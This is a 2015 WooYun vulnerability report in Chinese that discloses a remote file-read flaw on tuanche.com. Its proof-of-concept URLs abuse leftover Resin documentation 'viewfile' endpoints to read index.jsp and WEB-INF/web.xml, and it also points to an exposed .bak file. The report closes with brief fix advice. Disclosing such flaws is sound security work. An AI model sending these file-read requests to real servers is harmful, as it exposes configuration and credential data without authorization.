当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0119552

漏洞标题:团车网网站远程文件读取漏洞

相关厂商:tuanche.com

漏洞作者: 路人甲

提交时间:2015-06-11 17:42

修复时间:2015-07-26 17:44

公开时间:2015-07-26 17:44

漏洞类型:系统/服务运维配置不当

危害等级:中

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-06-11: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-07-26: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

因为配置不当,导致服务器文件读取,泄露文件信息

详细说明:

漏洞证明:

1:测试URL:

http://qd.tuanche.com/resin-doc/viewfile/?file=index.jsp


2:输出

11111111111111110141005.png


3:扩展
>平台上也有默认的example未被处理
如:

http://qd.tuanche.com/resin-doc/examples/ioc-periodictask/viewfile?file=WEB-INF/web.xml


http://qd.tuanche.com/resin-doc/examples/ioc-periodictask/viewfile?file=index.xtp


>还有一些开发配置文件,万一里面存储的是账户或配置信息呢
http://tuanche.com/about_21.shtml.bak

修复方案:

1加强配置的安全性处理
2:增强开发运维相关人员的安全性意识

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝